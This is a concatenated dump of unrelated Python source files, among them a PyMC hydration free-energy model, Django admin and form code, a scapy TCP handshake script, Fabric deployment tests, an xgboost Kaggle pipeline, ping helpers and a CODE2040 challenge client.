        if parameter_name == 'gamma':
            # gamma in kcal/mol; allowed to go negative.
            stochastic = pymc.Uniform(key, value=value, lower=-10.0, upper=+10.0)
        elif parameter_name == 'radius':
            # radius in Angstroms.
            stochastic = pymc.Uniform(key, value=value, lower=1.0, upper=3.0)
        else:
            raise Exception("Unrecognized parameter name: %s" % parameter_name)
        model[key] = stochastic
        parameters[key] = stochastic
    # Define deterministic functions for hydration free energies.
    for (molecule_index, molecule) in enumerate(molecules):
        molecule_name = molecule.GetTitle()
        variable_name = "dg_gbvi_%08d" % molecule_index
        # Determine which parameters are involved in this molecule to limit number of parents for caching.
        parents = dict()
        for atom in molecule.GetAtoms():
            atomtype = atom.GetStringData("gbvi_type") # GBVI atomtype
            for parameter_name in ['gamma', 'radius']:
                stochastic_name = '%s_%s' % (atomtype,parameter_name)
                parents[stochastic_name] = parameters[stochastic_name]
        print "%s : " % molecule_name,
        print parents.keys()
        # Create deterministic variable for computed hydration free energy.
        function = hydration_energy_factory(molecule)
        model[variable_name] = pymc.Deterministic(eval=function,
                                                  name=variable_name,
                                                  parents=parents,
                                                  doc=molecule_name,
                                                  trace=True,
                                                  verbose=1,
                                                  dtype=float,
                                                  plot=False,
                                                  cache_depth=2)
    # Define error model: one shared sigma (kcal/mol), sampled on a log scale.
    log_sigma_min = math.log(0.01) # kcal/mol
    log_sigma_max = math.log(10.0) # kcal/mol
    log_sigma_guess = math.log(0.2) # kcal/mol
    model['log_sigma'] = pymc.Uniform('log_sigma', lower=log_sigma_min, upper=log_sigma_max, value=log_sigma_guess)
    model['sigma'] = pymc.Lambda('sigma', lambda log_sigma=model['log_sigma'] : math.exp(log_sigma) )
    model['tau'] = pymc.Lambda('tau', lambda sigma=model['sigma'] : sigma**(-2) )
    # One observed Normal per molecule, centered on the computed energy.
    for (molecule_index, molecule) in enumerate(molecules):
        molecule_name = molecule.GetTitle()
        variable_name = "dg_exp_%08d" % molecule_index
        dg_exp = float(OEGetSDData(molecule, 'dG(exp)')) # observed hydration free energy in kcal/mol
        model[variable_name] = pymc.Normal(mu=model['dg_gbvi_%08d' % molecule_index], tau=model['tau'], value=dg_exp, observed=True)
    return model
#=============================================================================================
# MAIN
#=============================================================================================
if __name__=="__main__":
    # Driver: load typed molecules, assign charges/conformers, then evaluate
    # GB/VI hydration energies for the initial parameters plus every parameter
    # set recorded in a previous MCMC run, reporting RMS error per iteration.
    # NOTE(review): Python 2 script (print statements, optparse); requires the
    # OpenEye toolkits, OpenMM and PyMC, none of which are visible here.
    # Create command-line argument options.
    usage_string = """\
usage: %prog --types typefile --parameters paramfile --molecules molfile
example: %prog --types parameters/gbvi.types --parameters parameters/gbvi-am1bcc.parameters --molecules datasets/solvation.sdf --mcmcDb MCMC_db_name
"""
    version_string = "%prog %__version__"
    parser = OptionParser(usage=usage_string, version=version_string)
    parser.add_option("-t", "--types", metavar='TYPES',
                      action="store", type="string", dest='atomtypes_filename', default='',
                      help="Filename defining atomtypes as SMARTS atom matches.")
    parser.add_option("-p", "--parameters", metavar='PARAMETERS',
                      action="store", type="string", dest='parameters_filename', default='',
                      help="File containing initial parameter set.")
    parser.add_option("-m", "--molecules", metavar='MOLECULES',
                      action="store", type="string", dest='molecules_filename', default='',
                      help="Small molecule set (in any OpenEye compatible file format) containing 'dG(exp)' fields with experimental hydration free energies.")
    parser.add_option("-d", "--mcmcDb", metavar='MCMC_Db',
                      action="store", type="string", dest='mcmcDb', default='',
                      help="MCMC db name.")
    # Parse command-line arguments.
    (options,args) = parser.parse_args()
    # Ensure all required options have been specified.
    if options.atomtypes_filename=='' or options.parameters_filename=='' or options.molecules_filename=='' or options.mcmcDb == '':
        parser.print_help()
        parser.error("All input files must be specified.")
    # Read GBVI parameters.
    parameters = read_gbvi_parameters(options.parameters_filename)
    mcmcDbName = options.mcmcDb
    # Echo the configuration to both stderr and stdout.
    printString = "Starting " + sys.argv[0] + "\n"
    printString += ' atom types=<' + options.atomtypes_filename + ">\n"
    printString += ' parameters=<' + options.parameters_filename + ">\n"
    printString += ' molecule=<' + options.molecules_filename + ">\n"
    printString += ' mcmcDB=<' + options.mcmcDb + ">\n"
    sys.stderr.write( printString )
    sys.stdout.write( printString )
    # Construct atom typer.
    atom_typer = AtomTyper(options.atomtypes_filename, "gbvi_type")
    # Load and type all molecules in the specified dataset.
    print "Loading and typing all molecules in dataset..."
    start_time = time.time()
    molecules = list()
    input_molstream = oemolistream(options.molecules_filename)
    molecule = OECreateOEGraphMol()
    while OEReadMolecule(input_molstream, molecule):
        # Get molecule name.
        name = OEGetSDData(molecule, 'name').strip()
        molecule.SetTitle(name)
        # Append to list (copy, since `molecule` is reused by the read loop).
        molecule_copy = OEMol(molecule)
        molecules.append(molecule_copy)
    input_molstream.close()
    print "%d molecules read" % len(molecules)
    end_time = time.time()
    elapsed_time = end_time - start_time
    print "%.3f s elapsed" % elapsed_time
    # Add explicit hydrogens.
    for molecule in molecules:
        openeye.oechem.OEAddExplicitHydrogens(molecule)
    # Build a conformation for all molecules with Omega.
    print "Building conformations for all molecules..."
    import openeye.oeomega
    omega = openeye.oeomega.OEOmega()
    omega.SetMaxConfs(1)
    omega.SetFromCT(True)
    for molecule in molecules:
        #omega.SetFixMol(molecule)
        omega(molecule)
    end_time = time.time()
    elapsed_time = end_time - start_time
    print "%.3f s elapsed" % elapsed_time
    # Regularize all molecules through writing as mol2.
    print "Regularizing all molecules..."
    ligand_mol2_dirname = os.path.dirname(mcmcDbName) + '/mol2'
    if( not os.path.exists( ligand_mol2_dirname ) ):
        os.makedirs(ligand_mol2_dirname)
    ligand_mol2_filename = ligand_mol2_dirname + '/temp' + os.path.basename(mcmcDbName) + '.mol2'
    start_time = time.time()
    omolstream = openeye.oechem.oemolostream(ligand_mol2_filename)
    for molecule in molecules:
        # Write molecule as mol2, changing molecule through normalization.
        openeye.oechem.OEWriteMolecule(omolstream, molecule)
    omolstream.close()
    end_time = time.time()
    elapsed_time = end_time - start_time
    print "%.3f s elapsed" % elapsed_time
    # Assign AM1-BCC charges.
    print "Assigning AM1-BCC charges..."
    start_time = time.time()
    for molecule in molecules:
        # Assign AM1-BCC charges.
        if molecule.NumAtoms() == 1:
            # Use formal charges for ions.
            OEFormalPartialCharges(molecule)
        else:
            # Assign AM1-BCC charges for multiatom molecules.
            OEAssignPartialCharges(molecule, OECharges_AM1BCC, False) # use explicit hydrogens
        # Check to make sure we ended up with partial charges.
        if OEHasPartialCharges(molecule) == False:
            print "No charges on molecule: '%s'" % molecule.GetTitle()
            print "IUPAC name: %s" % OECreateIUPACName(molecule)
            # TODO: Write molecule out
            # Delete themolecule.
            # NOTE(review): removing from `molecules` while iterating it skips
            # the element immediately after each removal -- confirm intended.
            molecules.remove(molecule)
    end_time = time.time()
    elapsed_time = end_time - start_time
    print "%.3f s elapsed" % elapsed_time
    print "%d molecules remaining" % len(molecules)
    # Type all molecules with GAFF parameters.
    start_time = time.time()
    typed_molecules = list()
    untyped_molecules = list()
    for molecule in molecules:
        # Assign GBVI types according to SMARTS rules.
        try:
            atom_typer.assignTypes(molecule)
            typed_molecules.append(OEGraphMol(molecule))
            #atom_typer.debugTypes(molecule)
        except AtomTyper.TypingException as exception:
            # NOTE(review): `name` here is whatever the last read-loop
            # iteration left behind, not this molecule's title -- confirm.
            print name
            print exception
            untyped_molecules.append(OEGraphMol(molecule))
    end_time = time.time()
    elapsed_time = end_time - start_time
    print "%d molecules correctly typed" % (len(typed_molecules))
    print "%d molecules missing some types" % (len(untyped_molecules))
    print "%.3f s elapsed" % elapsed_time
    # Load updated parameter sets from the PyMC text-backend trace files.
    parameter_sets = list()
    for key in parameters.keys():
        # Read parameters.
        filename = mcmcDbName + '.txt/Chain_0/%s.txt' % key
        print "Parameter %s from file %s" %( key, filename )
        infile = open(filename, 'r')
        lines = infile.readlines()
        infile.close()
        # Discard header
        lines = lines[3:]
        # Insert parameter: grow parameter_sets lazily, one dict per MCMC sample.
        for (index, line) in enumerate(lines):
            elements = line.split()
            parameter = float(elements[0])
            try:
                parameter_sets[index][key] = parameter
            except Exception:
                parameter_sets.append( dict() )
                parameter_sets[index][key] = parameter
    # Evaluate the initial parameters followed by every sampled parameter set.
    for (index, parameter_set) in enumerate([parameters] + parameter_sets): # skip some
        #for (index, parameter_set) in enumerate([parameters] + parameter_sets[::10]): # skip some
        # Compute energies with all molecules.
        print "Computing all energies..."
        start_time = time.time()
        energies = compute_hydration_energies(typed_molecules, parameter_set)
        #energies = compute_hydration_energies_parallel(typed_molecules, parameter_set)
        end_time = time.time()
        elapsed_time = end_time - start_time
        print "%.3f s elapsed" % elapsed_time
        # # Print comparison.
        # for molecule in typed_molecules:
        # # Get metadata.
        # name = OEGetSDData(molecule, 'name').strip()
        # dg_exp = float(OEGetSDData(molecule, 'dG(exp)')) * units.kilocalories_per_mole
        # # Form output.
        # outstring = "%48s %8.3f %8.3f" % (name, dg_exp / units.kilocalories_per_mole, energies[molecule] / units.kilocalories_per_mole)
        # print outstring
        # Print summary statistics.
        signed_errors = numpy.zeros([len(typed_molecules)], numpy.float64)
        for (i, molecule) in enumerate(typed_molecules):
            # Get metadata.
            name = OEGetSDData(molecule, 'name').strip()
            energy = energies[molecule] / units.kilocalories_per_mole
            if( math.isnan(energy) ):
                # NOTE(review): `dg_exp` here is left over from a previous
                # iteration (undefined on the first) -- confirm intended.
                print "%5d dG: nan %8.3f %s" % (i, dg_exp / units.kilocalories_per_mole, name)
            else:
                try:
                    dg_exp = float(OEGetSDData(molecule, 'dG(exp)')) * units.kilocalories_per_mole
                    signed_errors[i] = energies[molecule] / units.kilocalories_per_mole - dg_exp / units.kilocalories_per_mole
                except:
                    print "Problem getting dG(exp) for molecule %d %s" % (i, name)
        print "iteration %8d : RMS error %8.3f kcal/mol" % (index, signed_errors.std())
|
7,168 | 7e328992392a4ff2b0e23920a8907e38f63fcff0 | from django.contrib import admin
from .models import Game, Scrap

# Expose Game and Scrap in the Django admin with the default ModelAdmin.
admin.site.register(Game)
admin.site.register(Scrap)
|
7,169 | acd6197e60cf59ffcaa33bb50a60a03592bb3559 | #! /usr/bin/python3
from scapy.all import *
import sys

# Hand-rolled TCP three-way handshake with scapy (bypasses the kernel stack):
#   argv[1] = source IP, argv[2] = destination IP.
ip=IP(src=sys.argv[1], dst=sys.argv[2])
# SYN with our initial sequence number 100; advertise MSS 689 and window scaling.
syn_packet = TCP(sport=52255, dport=1237, flags="S", seq=100, options=[('MSS',689),('WScale',1)])
# Send the SYN and block for the peer's SYN/ACK.
synack_packet = sr1(ip/syn_packet)
# Final ACK: our seq advances to ISN+1 (101); ack = peer's ISN + 1.
my_ack = synack_packet.seq+1
ack_packet = TCP(sport=52255, dport=1237, flags="A", seq=101, ack=my_ack)
send(ip/ack_packet)
7,170 | 3941f283893c259033d7fb3be83c8071433064ba | from output.models.nist_data.list_pkg.nmtokens.schema_instance.nistschema_sv_iv_list_nmtokens_min_length_5_xsd.nistschema_sv_iv_list_nmtokens_min_length_5 import NistschemaSvIvListNmtokensMinLength5
# Sample instance for the NIST schema test: an NMTOKENS list value satisfying
# minLength=5 (this one supplies ten single-character tokens).
obj = NistschemaSvIvListNmtokensMinLength5(
    value=[
        "f",
        "D",
        "T",
        "a",
        "b",
        "C",
        "o",
        "t",
        "t",
        "w",
    ]
)
7,171 | 7700e3c4061f0e81a1dea8fa8b27a0380fc26e71 | #!/usr/bin/env python
#
# Copyright (C) University College London, 2007-2012, all rights reserved.
#
# This file is part of HemeLB and is CONFIDENTIAL. You may not work
# with, install, use, duplicate, modify, redistribute or share this
# file, or any part thereof, other than as allowed by any agreement
# specifically made by you with University College London.
#
# encoding: utf-8
"""
test_machine_environment.py
Created by James Hetherington on 2012-01-19.
Copyright (c) 2012 UCL. All rights reserved.
"""
import unittest
import sys
import copy
import textwrap
from ..fab import *
class TestFabric(unittest.TestCase):
    """Tests for the Fabric deployment tasks in deploy.fab.

    setUp monkeypatches the remote-execution primitives (run/local/put/
    rsync_project/generate) so each task only records the shell commands it
    *would* have issued into self.commands; tests then assert on that list
    instead of touching any machine.
    """
    def setUp(self):
        #Update the user config with testing example
        env.test_home=os.path.join(env.localroot,'deploy','test')
        user_config=yaml.load(open(os.path.join(env.localroot,'deploy','test','machines_user.yml')))
        env.update(user_config['default'])
        execute(planck) #Default machine target is assumed as planck.
        #Monkeypatch the fabric commands to do nothing, but record what they would have done
        sys.modules['deploy.fab'].run=lambda command: self.commands.append(command)
        def mock_local(command,original=sys.modules['deploy.fab'].local):
            # Record, then still execute locally (original bound at patch time).
            self.commands.append(command)
            original(command)
        sys.modules['deploy.fab'].local=mock_local
        sys.modules['deploy.fab'].put=lambda source,target: self.commands.append("put "+source+" "+target)
        sys.modules['deploy.fab'].rsync_project=lambda **args: self.commands.append("rsync "+args['local_dir']+" "+args['remote_dir'])
        def mock_profile(profile,original=sys.modules['deploy.fab'].generate):
            # Record the profile parameters, then run the real generator.
            self.commands.append("generate %g %g %g"%(profile.VoxelSize, profile.Steps , profile.Cycles) )
            original(profile)
        sys.modules['deploy.fab'].generate=mock_profile
        self.commands=[]
        env.build_number='abcd1234'
    # --- assertion helpers over the recorded command list ---
    def assertCommandCount(self,should_be):
        # Exactly `should_be` commands were recorded.
        self.assertEqual(len(self.commands),should_be)
    def assertCommand(self,should_be,index=-1):
        # Command at `index` (default: last) matches exactly.
        self.assertEqual(self.commands[index],should_be)
    def assertCommandRegexp(self,should_be,index=-1):
        # Command at `index` (default: last) matches the regexp.
        self.assertRegexpMatches(self.commands[index],should_be)
    def test_machine_alias(self):
        # Machine tasks switch env.remote to the right host.
        self.assertEqual(env.remote,"planck.chem.ucl.ac.uk")
        execute(julian)
        self.assertEqual(env.remote,"julian.chem.ucl.ac.uk")
        execute(hector)
        self.assertEqual(env.remote,"login.hector.ac.uk")
    def test_clean(self):
        execute(clean)
        self.assertCommand('make clean')
    def test_with_job(self):
        # with_job appends the job name to both remote and local result paths.
        with settings(results_path="banana",local_results='pineapple'):
            with_job('foo')
            self.assertEqual(env.job_results,"banana/foo")
            self.assertEqual(env.job_results_local,"pineapple/foo")
    def test_with_template_job(self):
        # Job names may be built from a template over env variables.
        with settings(results_path='banana',foo='fish',bar='swim',job_name_template="${foo}_${bar}"):
            with_template_job()
            self.assertEqual(env.job_results,"banana/fish_swim")
    def test_hemelb(self):
        # A single hemelb run: stage config, submit script, collect results.
        execute(hemelb,'cylinder',cores=5)
        self.assertEqual(env.name,"cylinder_abcd1234_planck_5_10_10")
        self.assertCommandRegexp('mkdir -p .*config_files/cylinder',0)
        self.assertCommandRegexp('rsync .*config_files/cylinder',1)
        self.assertCommandRegexp("put .*scripts/cylinder_abcd1234_planck_5_10_10.sh",2)
        self.assertCommandRegexp("mkdir -p .*results/cylinder_abcd1234_planck_5_10_10",3)
        self.assertCommandRegexp("cp .*scripts/cylinder_abcd1234_planck_5_10_10.sh .*results/cylinder_abcd1234_planck_5_10_10",4)
        self.assertCommandRegexp("cp .*CMakeCache.txt .*results/cylinder_abcd1234_planck_5_10_10",5)
        self.assertCommandRegexp("put .*env.yml",6)
        self.assertCommandRegexp("chmod u\+x .*scripts/cylinder_abcd1234_planck_5_10_10.sh",7)
        self.assertCommandRegexp(".*scripts/cylinder_abcd1234_planck_5_10_10.sh",8)
        self.assertCommandCount(9)
    def test_hemelbs(self):
        # Sweep over core counts [1:6:1] -> 5 runs of 9 commands each.
        execute(hemelbs,'cylinder',cores='[1:6:1]')
        self.assertCommandRegexp('rsync .*config_files/cylinder',1)
        self.assertCommandRegexp("cylinder_abcd1234_planck_5_10_10.sh")
        self.assertCommandCount(9*5)
    def test_create_config(self):
        execute(create_config,'cylinder',VoxelSize=0.1)
        self.assertEqual(env.config,"cylinder_0_1_1000_3")
        self.assertCommandRegexp("mkdir -p .*/configs/cylinder_0_1_1000_3",0)
        self.assertCommand("generate 0.1 1000 3",1)
        self.assertCommandCount(2)
    def test_create_configs(self):
        # Sweep over voxel sizes [0.1:0.21:0.01] -> 11 configs, 2 commands each.
        execute(create_configs,'cylinder',VoxelSize='[0.1:0.21:0.01]')
        self.assertEqual(env.config,"cylinder_0_2_1000_3")
        self.assertCommandRegexp("mkdir -p .*/configs/cylinder_0_1_1000_3",0)
        self.assertCommand("generate 0.1 1000 3",1)
        self.assertCommandCount(2*11)
    def test_hemelb_profile(self):
        # Full profile: generate 11 configs then run each at 5 core counts.
        execute(hemelb_profile,'cylinder',VoxelSize='[0.1:0.21:0.01]',cores='[1:6:1]')
        self.assertEqual(env.name,"cylinder_0_2_1000_3_abcd1234_planck_5_10_10")
        self.assertCommandRegexp("mkdir -p .*/configs/cylinder_0_1_1000_3",0)
        self.assertCommand("generate 0.1 1000 3",1)
        self.assertCommandRegexp('mkdir -p .*config_files/cylinder',2)
        self.assertCommandRegexp('rsync .*config_files/cylinder',3)
        self.assertCommandRegexp("put .*scripts/cylinder_0_1_1000_3_abcd1234_planck_1_10_10.sh",4)
        self.assertCommandRegexp("mkdir -p .*results/cylinder_0_1_1000_3_abcd1234_planck_1_10_10",5)
        self.assertCommandRegexp("cp .*scripts/cylinder_0_1_1000_3_abcd1234_planck_1_10_10.sh .*results/cylinder_0_1_1000_3_abcd1234_planck_1_10_10",6)
        self.assertCommandRegexp("cp .*CMakeCache.txt .*results/cylinder_0_1_1000_3_abcd1234_planck_1_10_10",7)
        self.assertCommandRegexp("put .*env.yml",8)
        self.assertCommandRegexp("chmod u\+x .*scripts/cylinder_0_1_1000_3_abcd1234_planck_1_10_10.sh",9)
        self.assertCommandRegexp(".*scripts/cylinder_0_1_1000_3_abcd1234_planck_1_10_10.sh",10)
        self.assertCommandCount(2*11 + 9*11*5)
    def test_hemelb_profile_no_config_generation(self):
        # Same sweep, but config generation suppressed -> no generate commands.
        execute(hemelb_profile,'cylinder',VoxelSize='[0.1:0.21:0.01]',cores='[1:6:1]',create_configs="False")
        self.assertEqual(env.name,"cylinder_0_2_1000_3_abcd1234_planck_5_10_10")
        self.assertCommandRegexp('mkdir -p .*config_files/cylinder',0)
        self.assertCommandRegexp('rsync .*config_files/cylinder',1)
        self.assertCommandRegexp("put .*scripts/cylinder_0_1_1000_3_abcd1234_planck_1_10_10.sh",2)
        self.assertCommandRegexp("mkdir -p .*results/cylinder_0_1_1000_3_abcd1234_planck_1_10_10",3)
        self.assertCommandRegexp("cp .*scripts/cylinder_0_1_1000_3_abcd1234_planck_1_10_10.sh .*results/cylinder_0_1_1000_3_abcd1234_planck_1_10_10",4)
        self.assertCommandRegexp("cp .*CMakeCache.txt .*results/cylinder_0_1_1000_3_abcd1234_planck_1_10_10",5)
        self.assertCommandRegexp("put .*env.yml",6)
        self.assertCommandRegexp("chmod u\+x .*scripts/cylinder_0_1_1000_3_abcd1234_planck_1_10_10.sh",7)
        self.assertCommandRegexp(".*scripts/cylinder_0_1_1000_3_abcd1234_planck_1_10_10.sh",8)
        self.assertCommandCount(9*11*5)
    def test_configure_default(self):
        execute(configure)
        target={
            'CMAKE_BUILD_TYPE': "Release",
            'CMAKE_CXX_FLAGS_RELEASE': "-O4",
            'CMAKE_INSTALL_PREFIX': env.install_path,
            'CPPUNIT_PATCH_LDL' : True,
            "HEMELB_DEPENDENCIES_INSTALL_PATH": env.install_path,
            "HEMELB_SUBPROJECT_MAKE_JOBS": 1
        }
        self.assertEqual(env.total_cmake_options,target)
        #Can't just assert on a string here, as the order of the dict is not defined
        for key,value in target.iteritems():
            self.assertRegexpMatches(env.cmake_flags,"-D%s=%s"%(key,value))
    def test_configure_debug(self):
        execute(configure,'debug')
        self.assertEqual(env.total_cmake_options,
            {
                'CMAKE_BUILD_TYPE': "Debug",
                'HEMELB_OPTIMISATION': "",
                'HEMELB_LOG_LEVEL': "debug",
                'CPPUNIT_PATCH_LDL' : True,
                'CMAKE_INSTALL_PREFIX': env.install_path,
                "HEMELB_DEPENDENCIES_INSTALL_PATH": env.install_path,
                "HEMELB_SUBPROJECT_MAKE_JOBS": 1
            })
    def test_script_template(self):
        # Templates are concatenated and extra commands appended at the end.
        script=script_templates('dummy_ge_header','dummy_jobscript',commands=['extra'])
        content=open(script).read()
        self.assertEqual(content,"user: test_user\n\nrun bananas\n\nextra")
7,172 | a6365104125725f11010c35eb0781c941de803f8 | import pandas
import evaluation
import sys
sys.path.append('D:\\libs\\xgboost\\wrapper')
import xgboost as xgb
# Read training data
folder = '../data/'
train = pandas.read_csv(folder + 'training.csv', index_col='id')
# Define features to drop from train data
# variables_to_drop = ['mass', 'production', 'min_ANNmuon', 'signal', 'SPDhits', 'IP', 'IPSig', ]
# variables_to_drop = ['mass', 'production', 'min_ANNmuon', 'signal',
# 'SPDhits', 'p0_p', 'p1_p', 'p2_p', 'p0_eta', 'p1_eta', 'p2_eta', ]
variables_to_drop = ['mass', 'production', 'min_ANNmuon', 'signal',
                     'SPDhits', ]
# Train xgb model on train data ('signal' column is the binary label).
train_X = train.drop(variables_to_drop, 1).values
train_y = train['signal'].values
xg_train = xgb.DMatrix(train_X, label=train_y)
# params = {'silent': 1, 'nthread': 2, 'objective': 'binary:logistic', 'eval_metric': 'auc',
# 'max_depth': 6, 'eta': 0.3}
params = {'objective': 'binary:logistic',
          'eta': 0.3,
          'max_depth': 5,
          'min_child_weight': 3,
          'silent': 1,
          'subsample': 0.7,
          'colsample_bytree': 0.7,
          'seed': 1,
          'nthread': 2}
num_trees = 250
n_rounds = 120
watchlist = [(xg_train, 'train')]
xgb_model = xgb.train(params, xg_train, num_trees, watchlist)
# xgb_model = xgb.train(params, xg_train, n_rounds, watchlist)
# Check agreement test: KS distance between weighted output distributions
# must stay below the competition threshold 0.09.
check_agreement = pandas.read_csv(folder + 'check_agreement.csv', index_col='id')
xg_check_agreement = xgb.DMatrix(check_agreement.values)
agreement_probs = xgb_model.predict(xg_check_agreement)
ks = evaluation.compute_ks(
    agreement_probs[check_agreement['signal'].values == 0],
    agreement_probs[check_agreement['signal'].values == 1],
    check_agreement[check_agreement['signal'] == 0]['weight'].values,
    check_agreement[check_agreement['signal'] == 1]['weight'].values)
print 'KS metric', ks, ks < 0.09
# Check correlation test: CvM statistic of prediction vs. mass must be < 0.002.
check_correlation = pandas.read_csv(folder + 'check_correlation.csv', index_col='id')
xg_check_correlation = xgb.DMatrix(check_correlation.values)
correlation_probs = xgb_model.predict(xg_check_correlation)
cvm = evaluation.compute_cvm(correlation_probs, check_correlation['mass'])
print 'CvM metric', cvm, cvm < 0.002
# Compute weighted AUC on the training data with min_ANNmuon > 0.4
train_eval = train[train['min_ANNmuon'] > 0.4]
train_eval_X = train_eval.drop(variables_to_drop, 1).values
xg_train_eval = xgb.DMatrix(train_eval_X)
train_probs = xgb_model.predict(xg_train_eval)
AUC = evaluation.roc_auc_truncated(train_eval['signal'], train_probs)
print 'AUC', AUC
# Predict test, create file for kaggle
test = pandas.read_csv(folder + 'test.csv', index_col='id')
test_X = test.values
xg_test = xgb.DMatrix(test_X)
result = pandas.DataFrame({'id': test.index})
result['prediction'] = xgb_model.predict(xg_test)
result.to_csv('../submissions/xgb.csv', index=False, sep=',')
7,173 | 8419aee5dbc64b51f3c0f364716aad1630f00fe9 | import sys, os, json
sys.path.append(os.path.join(os.path.dirname(__file__), "requests"))
import requests
def findNonPrefixes(prefix, array):
    """Return the strings in *array* that do not start with *prefix*.

    prefix: the prefix string to test for (an empty prefix matches every
            string, so the result is then empty).
    array:  iterable of strings.
    Returns a new list preserving the input order.
    """
    # str.startswith replaces the original manual slice-and-compare.
    return [string for string in array if not string.startswith(prefix)]
def run ():
    """Solve the CODE2040 prefix challenge over its HTTP API.

    Fetches {'prefix', 'array'} for our token, filters out strings that do
    not carry the prefix, and posts the result back for validation.
    NOTE(review): the API token is hard-coded in source -- fine for a one-off
    challenge, but should not be committed in real projects.
    """
    # Fetch the challenge payload.
    r = requests.post("http://challenge.code2040.org/api/prefix", data={'token': '747bece10e7785955b91c15de7435216'})
    result = r.json()
    prefix = result["prefix"]
    stringArray = result["array"]
    resultArray = findNonPrefixes(prefix, stringArray)
    # Submit the filtered array back as JSON for validation.
    headers = {'Content-Type': 'application/json', 'Accept':'application/json'}
    payload = {'token': '747bece10e7785955b91c15de7435216', 'array': resultArray}
    r2 = requests.post("http://challenge.code2040.org/api/prefix/validate", data=json.dumps(payload), headers = headers)

run()
7,174 | ae8add3adc336c9404cd2aeab4aff81c94c8884e | from django.contrib.auth.forms import UserChangeForm
from django.contrib.auth.models import User
from django import forms
class editForm(forms.ModelForm):
    """Profile-edit form bound to Django's built-in User model.

    Each field overrides the default widget only to attach Bootstrap's
    ``form-control`` CSS class; validation rules are the field defaults.
    """
    username = forms.CharField(max_length=100, widget= forms.TextInput(attrs={'class': 'form-control'}))
    first_name = forms.CharField(max_length=100, widget= forms.TextInput(attrs={'class': 'form-control'}))
    last_name = forms.CharField(max_length=100, widget= forms.TextInput(attrs={'class': 'form-control'}))
    email = forms.EmailField(widget= forms.EmailInput(attrs={'class': 'form-control'}))

    class Meta:
        model = User
        fields = ('username', 'first_name', 'last_name', 'email')
7,175 | 892f90edbd8bd54841b815a6bc29d136c5e84a38 | # This defines a new interface, called MyClosedInterface
# which is closed (does not allow new members to be added).
# "eci" is the schema id for this extension.
# Extension specification (a bare dict literal, presumably eval/exec'd by the
# schema loader -- TODO confirm): registers schema id "eci" defining one
# closed Interface subtype plus example attribute/dataset/group members.
{"fs": { "eci": {
    "info": {
        "name": "Example closed Interface extension",
        "version": "1.0",
        "date": "Sept. 22, 2016",
        "author": "Jeff Teeters",
        "contact": "jteeters@berkeley.edu",
        "description": ("Extension defining a new closed Interface")
    },
    "schema": {
        "MyClosedInterface/": {
            "merge": ["core:<Interface>/"],
            "description": ("A new interface defined in extension e-closed-interface.py."
                " This is closed (no new members can be added)."),
            "_properties": {"closed": True}, # specify that this group is closed (no new members can be added).
            "attributes": {
                "foo": {
                    "description": "example text attributed for MyClosedInterface",
                    "data_type": "text"}},
            "bar": {
                "description": ("Example dataset included with MyClosedInterface"),
                "data_type": "int",
                "dimensions": ["num_measurements"]},
            "bazc/": {
                "description": ("Example closed group in MyClosedInterface"),
                # "_closed": True,
                "_properties": {"closed": True}},
            "bazo/": {
                "description": ("Example open group in MyClosedInterface"),
                # "_closed": False,
                "_properties": {"closed": False}}
        }
    }
}}}
|
7,176 | 3f2221f5f3a699020dd5986acb793e3083976dff | import subprocess
import datetime
def ping_address(host, n):
    """Ping *host* n times using the POSIX ``ping -c`` flag.

    Returns the (stdout, stderr) byte strings produced by the ping process.
    """
    completed = subprocess.run(
        ["ping", "-c", str(n), host],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE)
    return completed.stdout, completed.stderr
def ping_address_windows(host, n):
    """Ping *host* n times using Windows' ``ping -n`` flag.

    Returns the (stdout, stderr) byte strings produced by the ping process.
    """
    completed = subprocess.run(
        ["ping", "-n", str(n), host],  # Need -c for linux
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE)
    return completed.stdout, completed.stderr
def parse_msg(msg):
    """Return the second-to-last line of *msg*.

    For POSIX ping output this is the rtt summary line
    ("rtt min/avg/max/mdev = ..."), which get_vals then parses.
    """
    return msg.split('\n')[-2]
def get_vals(msg):
    """Parse a POSIX ping rtt summary line into (min, avg, max, mdev) floats.

    Expects text of the form "rtt min/avg/max/mdev = a/b/c/d ms".
    Returns four NaNs (and prints a notice) if the line cannot be parsed.
    """
    rhs = msg.split('=')
    try:
        nums = rhs[1].split('/')
        min_num = float(nums[0])
        ave_num = float(nums[1])
        max_num = float(nums[2])
        # Last field carries a trailing unit ("d ms"); strip it off.
        std_num = float(nums[3].split(' ')[0])
    # Narrowed from a bare `except:` -- only parsing failures are expected:
    # missing '=' (IndexError), non-numeric fields (ValueError), or a
    # non-string argument (AttributeError).
    except (IndexError, ValueError, AttributeError):
        print("Could not Ping Website...")
        min_num = float('nan')
        ave_num = float('nan')
        max_num = float('nan')
        std_num = float('nan')
    return min_num, ave_num, max_num, std_num
def get_vals_windows(msg):
    """Parse a Windows ping summary line into (min, avg, max, nan) floats.

    Windows ping prints "Minimum = Xms, Maximum = Yms, Average = Zms" -- note
    the order: the second value is the MAXIMUM and the third the AVERAGE.
    The original code assigned them positionally and therefore returned the
    maximum in the `ave` slot and the average in the `max` slot; fixed here.
    Windows reports no deviation, so the fourth element is always NaN.
    Returns four NaNs (and prints a notice) if the line cannot be parsed.
    """
    rhs = msg.split('=')
    try:
        min_num = float(rhs[1].split('ms')[0])
        # rhs[2] is "Maximum", rhs[3] is "Average" in Windows output.
        max_num = float(rhs[2].split('ms')[0])
        ave_num = float(rhs[3].split('ms')[0])
        std_num = float('nan')
    # Narrowed from a bare `except:` to the expected parsing failures.
    except (IndexError, ValueError, AttributeError):
        print("Could not Ping Website...")
        min_num = float('nan')
        ave_num = float('nan')
        max_num = float('nan')
        std_num = float('nan')
    return min_num, ave_num, max_num, std_num
def get_date_and_time():
    """Return the current local date and time as a naive datetime.datetime."""
    return datetime.datetime.now()
7,177 | 6027836b1b5d3cb8b842b1a1b77f5c9777269896 | """
ะ ะผะฐััะธะฒะต ัะปััะฐะนะฝัั
ัะตะปัั
ัะธัะตะป ะฟะพะผะตะฝััั ะผะตััะฐะผะธ ะผะธะฝะธะผะฐะปัะฝัะน ะธ ะผะฐะบัะธะผะฐะปัะฝัะน ัะปะตะผะตะฝัั.
"""
import random
SIZE = 10
MIN_ITEM = -100
MAX_ITEM = 100
array = [random.randint(MIN_ITEM, MAX_ITEM) for _ in range(SIZE)]
print('ะะฐััะธะฒ ัะปััะฐะนะฝัั
ัะธัะตะป:\n', array)
min_el = array[0]
max_el = array[0]
max_el_inx = 0
min_el_inx = 0
for el in range(SIZE):
if array[el] > max_el:
max_el = array[el]
